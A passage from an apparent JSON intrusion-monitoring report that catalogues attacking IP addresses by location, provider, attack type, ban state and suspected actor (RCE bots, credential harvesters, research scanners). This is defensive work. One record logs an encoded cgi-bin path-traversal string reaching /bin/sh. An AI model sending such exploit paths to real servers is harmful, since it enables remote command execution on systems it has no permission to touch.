   "org": "Bombay Bullion Commmunication",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 2,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T19:53:00+02:00",
   "last_seen": "2026-10-05T19:53:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "repeat-offender",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-03",
    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
   "ip": "103.46.186.148",
   "country": "Indonesia",
   "cc": "ID",
   "city": "Utan",
   "lat": -6.17694,
   "lon": 106.947,
   "asn": 150462,
   "org": "PT Air Lintas Komunikasi",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 2,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T23:31:00+02:00",
   "last_seen": "2026-10-05T23:31:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "repeat-offender",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-05",
    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
   "ip": "104.234.186.154",
   "country": "Brazil",
   "cc": "BR",
   "city": "S\u00e3o Paulo",
   "lat": -23.5558,
   "lon": -46.6396,
   "asn": 269070,
   "org": "Hostzone Tecnologia LTDA",
   "ptr": "host-104-234-186-154.br-spo01.hostzone.net",
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T21:30:00+02:00",
   "last_seen": "2026-10-05T21:30:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "111.90.180.172",
   "country": "Cambodia",
   "cc": "KH",
   "city": "Phnom Penh",
   "lat": 11.5556,
   "lon": 104.933,
   "asn": 38235,
   "org": "Angkor Data Communication",
   "ptr": null,
   "types": [
    "credential-probe"
   ],
   "bans": 1,
   "max_offence": 3,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-05T23:59:00+02:00",
   "last_seen": "2026-10-05T23:59:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "repeat-offender",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
   "ip": "120.48.171.196",
   "country": "China",
   "cc": "CN",
   "city": "Jinrongjie (Xicheng District)",
   "lat": 39.9116,
   "lon": 116.351,
   "asn": 38365,
   "org": "Beijing Baidu Netcom Science and Technology Co., Ltd.",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T19:52:00+02:00",
   "last_seen": "2026-10-05T19:52:00+02:00",
   "sensors": [
    "web-2"
   ],
   "notes": [],
   "tags": [],
   "paths": [
    "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh"
   ],
   "actor": {
    "label": "Suspected Mirai-style IoT botnet",
    "confidence": "medium",
    "evidence": [
     "IoT/router exploit path with a downloader typical of Mirai-family loaders"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "120.48.22.219",
   "country": "China",
   "cc": "CN",
   "city": "Jinrongjie (Xicheng District)",
   "lat": 39.9116,
   "lon": 116.351,
   "asn": 38365,
   "org": "Beijing Baidu Netcom Science and Technology Co., Ltd.",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T04:18:00+02:00",
   "last_seen": "2026-10-06T04:18:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "128.199.182.55",
   "country": "Singapore",
   "cc": "SG",
   "city": "Singapore (Pioneer)",
   "lat": 1.32123,
   "lon": 103.695,
   "asn": 14061,
   "org": "DigitalOcean, LLC",
   "ptr": "ea73d34464.scan.leakix.org",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T20:36:00+02:00",
   "last_seen": "2026-10-05T20:36:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "research-scanner"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS ea73d34464.scan.leakix.org"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "129.213.151.234",
   "country": "United States",
   "cc": "US",
   "city": "Ashburn",
   "lat": 39.0418,
   "lon": -77.4744,
   "asn": 31898,
   "org": "Oracle Corporation",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T23:43:00+02:00",
   "last_seen": "2026-10-05T23:43:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "13.89.126.19",
   "country": "United States",
   "cc": "US",
   "city": "Des Moines",
   "lat": 41.5868,
   "lon": -93.625,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T22:25:00+02:00",
   "last_seen": "2026-10-05T22:25:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "130.12.180.117",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Amsterdam",
   "lat": 52.3734,
   "lon": 4.89406,
   "asn": 202412,
   "org": "Omegatech LTD",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 2,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-06T04:54:00+02:00",
   "last_seen": "2026-10-06T04:54:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "repeat-offender",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-06"
   ]
  },
  {
   "ip": "136.107.20.139",
   "country": "United States",
   "cc": "US",
   "city": "Washington D.C.",
   "lat": 38.9072,
   "lon": -77.0369,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "139.20.107.136.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T18:51:00+02:00",
   "last_seen": "2026-10-05T18:51:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "139.59.136.184",
   "country": "Germany",
   "cc": "DE",
   "city": "Frankfurt am Main",
   "lat": 50.1109,
   "lon": 8.68213,
   "asn": 14061,
   "org": "DigitalOcean, LLC",
   "ptr": "c3ee778768.scan.leakix.org",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 2,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T20:36:00+02:00",
   "last_seen": "2026-10-05T20:36:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "research-scanner",
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS c3ee778768.scan.leakix.org"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "142.93.129.190",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Amsterdam",
   "lat": 52.3563,
   "lon": 4.95714,
   "asn": 14061,
   "org": "DigitalOcean, LLC",
   "ptr": "f20a02ce01.scan.leakix.org",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T22:38:00+02:00",
   "last_seen": "2026-10-05T22:38:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "research-scanner"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS f20a02ce01.scan.leakix.org"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "143.244.168.161",
   "country": "United States",
   "cc": "US",
   "city": "North Bergen",
   "lat": 40.8054,
   "lon": -74.0241,
   "asn": 14061,
   "org": "DigitalOcean, LLC",
   "ptr": "b4ed9564d2.scan.leakix.org",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T04:24:00+02:00",
   "last_seen": "2026-10-06T04:24:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "research-scanner"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS b4ed9564d2.scan.leakix.org"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "147.182.149.75",
   "country": "Canada",
   "cc": "CA",
   "city": "Etobicoke",
   "lat": 43.6441,
   "lon": -79.5698,
   "asn": 14061,
   "org": "DigitalOcean, LLC",
   "ptr": "dec04dc34a.scan.leakix.org",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T04:52:00+02:00",
   "last_seen": "2026-10-06T04:52:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "research-scanner"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS dec04dc34a.scan.leakix.org"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "157.245.204.205",
   "country": "Singapore",
   "cc": "SG",
   "city": "Singapore (Pioneer)",
   "lat": 1.32123,
   "lon": 103.695,
   "asn": 14061,
   "org": "DigitalOcean, LLC",
   "ptr": "ca1b036c29.scan.leakix.org",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T22:38:00+02:00",
   "last_seen": "2026-10-05T22:38:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "research-scanner"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS ca1b036c29.scan.leakix.org"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "159.223.132.86",
   "country": "United States",
   "cc": "US",
   "city": "North Bergen",
   "lat": 40.8054,
   "lon": -74.0241,
   "asn": 14061,
   "org": "DigitalOcean, LLC",
   "ptr": "f090494790.scan.leakix.org",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T20:41:00+02:00",
   "last_seen": "2026-10-05T20:41:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "research-scanner"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS f090494790.scan.leakix.org"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "159.89.12.166",
   "country": "Germany",
   "cc": "DE",
   "city": "Rottweil",
   "lat": 48.1678,
   "lon": 8.62719,
   "asn": 14061,
   "org": "DigitalOcean, LLC",
   "ptr": "c5d51acfea.scan.leakix.org",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T20:41:00+02:00",
   "last_seen": "2026-10-05T20:41:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "research-scanner"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS c5d51acfea.scan.leakix.org"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "160.176.79.216",
   "country": "Morocco",
   "cc": "MA",
   "city": "Kenitra",
   "lat": 34.261,
   "lon": -6.5802,
   "asn": 36903,
   "org": "Office National des Postes et Telecommunications ONPT (Maroc Telecom) / IAM",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T03:04:00+02:00",
   "last_seen": "2026-10-06T03:04:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "164.92.107.174",
   "country": "United States",
   "cc": "US",
   "city": "Santa Clara",
   "lat": 37.3986,
   "lon": -121.964,
   "asn": 14061,
   "org": "DigitalOcean, LLC",
   "ptr": "dd761bf4f4.scan.leakix.org",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 2,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T20:36:00+02:00",
   "last_seen": "2026-10-05T20:36:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "research-scanner",
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS dd761bf4f4.scan.leakix.org"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "165.227.84.14",
   "country": "United States",
   "cc": "US",
   "city": "North Bergen",
   "lat": 40.8054,
   "lon": -74.0241,
   "asn": 14061,
   "org": "DigitalOcean, LLC",
   "ptr": "d3b29af448.scan.leakix.org",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T01:35:00+02:00",
   "last_seen": "2026-10-06T01:35:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "research-scanner"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS d3b29af448.scan.leakix.org"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "165.99.207.153",
   "country": "Pakistan",
   "cc": "PK",
   "city": "Islamabad (E-8)",
   "lat": 33.718,
   "lon": 73.0344,
   "asn": 45773,
   "org": "HEC",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T03:06:00+02:00",
   "last_seen": "2026-10-06T03:06:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "167.99.181.249",
   "country": "Canada",
   "cc": "CA",
   "city": "Toronto",
   "lat": 43.6548,
   "lon": -79.3885,
   "asn": 14061,
   "org": "DigitalOcean, LLC",
   "ptr": "b781e0bb13.scan.leakix.org",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T20:41:00+02:00",
   "last_seen": "2026-10-05T20:41:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "research-scanner"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS b781e0bb13.scan.leakix.org"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "176.65.148.150",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Eygelshoven",
   "lat": 50.8933,
   "lon": 6.05805,
   "asn": 51396,
   "org": "Pfcloud UG (haftungsbeschrankt)",
   "ptr": "176.65.148.150.ptr.pfcloud.network",
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 2,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-06T00:49:00+02:00",
   "last_seen": "2026-10-06T00:49:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "abuse-prone-hosting",
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Known-bad scanning infrastructure",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "AS51396 Pfcloud (abuse-prone hosting)"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "176.65.149.188",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Eygelshoven",
   "lat": 50.8933,
   "lon": 6.05805,
   "asn": 51396,
   "org": "Pfcloud UG (haftungsbeschrankt)",
   "ptr": "176.65.149.188.ptr.pfcloud.network",
   "types": [
    "attack-tool"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T00:19:00+02:00",
   "last_seen": "2026-10-06T00:19:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "abuse-prone-hosting"
   ],
   "paths": [],
   "actor": {
    "label": "Known-bad scanning infrastructure",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "AS51396 Pfcloud (abuse-prone hosting)"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "186.182.105.49",
   "country": "Paraguay",
   "cc": "PY",
   "city": "Ciudad del Este",
   "lat": -25.5036,
   "lon": -54.6507,
   "asn": 11664,
   "org": "Techtel LMDS Comunicaciones Interactivas S.A.",
   "ptr": "host49.186-182-105.in-addr.arpa.claro.com.py",
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 2,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T20:31:00+02:00",
   "last_seen": "2026-10-05T20:31:00+02:00",
   "sensors": [
    "web-2"
   ],
   "notes": [],
   "tags": [
    "repeat-offender",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-05",
    "2026-10-06"
   ]
  },
  {
   "ip": "187.108.1.142",
   "country": "Brazil",
   "cc": "BR",
   "city": "Joinville",
   "lat": -26.3044,
   "lon": -48.8464,
   "asn": 28267,
   "org": "SIM INTERNET PROVEDORES DE INTERNET EIRELI.",
   "ptr": "as28267.sc.simfibra.com.br",
   "types": [
    "attack-tool"
   ],
   "bans": 1,
   "max_offence": 3,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-05T18:01:00+02:00",
   "last_seen": "2026-10-05T18:14:00+02:00",
   "sensors": [
    "edge",
    "web-2",
    "web-3"
   ],
   "notes": [],
   "tags": [
    "repeat-offender",
    "multi-night"
   ],
   "paths": [
    "/"
   ],
   "actor": {
    "label": "Automated attack tool",
    "confidence": "low",
    "evidence": [
     "request carried a known attack-tool user agent"
    ]
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-05",
    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
   "ip": "193.32.162.157",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Amsterdam",
   "lat": 52.3676,
   "lon": 4.90414,
   "asn": 47890,
   "org": "UNMANAGED LTD",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 3,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-06T00:32:00+02:00",
   "last_seen": "2026-10-06T00:32:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "abuse-prone-hosting",
    "repeat-offender",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "AS47890 UNMANAGED LTD (abuse-prone hosting)",
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-06"
   ]
  },
  {
   "ip": "20.14.88.130",
   "country": "United States",
   "cc": "US",
   "city": "Phoenix",
   "lat": 33.4483,
   "lon": -112.073,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "attack-tool"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T02:32:00+02:00",
   "last_seen": "2026-10-06T02:32:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Automated attack tool",
    "confidence": "low",
    "evidence": [
     "request carried a known attack-tool user agent"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "20.163.10.217",
   "country": "United States",
   "cc": "US",
   "city": "Phoenix",
   "lat": 33.4483,
   "lon": -112.073,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T22:23:00+02:00",
   "last_seen": "2026-10-05T22:23:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "20.194.30.107",
   "country": "South Korea",
   "cc": "KR",
   "city": "Yongsan-dong",
   "lat": 37.5503,
   "lon": 126.997,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "php-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T22:30:00+02:00",
   "last_seen": "2026-10-05T22:30:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected CMS exploitation bot",
    "confidence": "low",
    "evidence": [
     "CMS, admin panel or PHP script probing"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "20.194.96.114",
   "country": "South Korea",
   "cc": "KR",
   "city": "Yongsan-dong",
   "lat": 37.5503,
   "lon": 126.997,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "php-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T01:05:00+02:00",
   "last_seen": "2026-10-06T01:05:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected CMS exploitation bot",
    "confidence": "low",
    "evidence": [
     "CMS, admin panel or PHP script probing"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "20.219.14.152",
   "country": "India",
   "cc": "IN",
   "city": "Pune",
   "lat": 18.5204,
   "lon": 73.8567,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "php-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T18:20:00+02:00",
   "last_seen": "2026-10-05T18:20:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected CMS exploitation bot",
    "confidence": "low",
    "evidence": [
     "CMS, admin panel or PHP script probing"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "20.64.98.9",
   "country": "United States",
   "cc": "US",
   "city": "San Antonio",
   "lat": 29.4252,
   "lon": -98.4946,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T22:25:00+02:00",
   "last_seen": "2026-10-05T22:25:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "20.65.145.206",
   "country": "United States",
   "cc": "US",
   "city": "San Antonio",
   "lat": 29.4252,
   "lon": -98.4946,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T22:23:00+02:00",
   "last_seen": "2026-10-05T22:23:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "20.65.178.72",
   "country": "United States",
   "cc": "US",
   "city": "San Antonio",
   "lat": 29.4252,
   "lon": -98.4946,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T22:25:00+02:00",
   "last_seen": "2026-10-05T22:25:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "20.80.111.73",
   "country": "United States",
   "cc": "US",
   "city": "Des Moines",
   "lat": 41.5868,
   "lon": -93.625,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T22:23:00+02:00",
   "last_seen": "2026-10-05T22:23:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "hosting-provider",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-03",
    "2026-10-06"
   ]
  },
  {
   "ip": "20.84.75.121",
   "country": "United States",
   "cc": "US",
   "city": "Ashburn",
   "lat": 39.0438,
   "lon": -77.4874,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": "azpdesyorfgm.stretchoid.com",
   "types": [
    "rce-payload"
   ],
   "bans": 1,
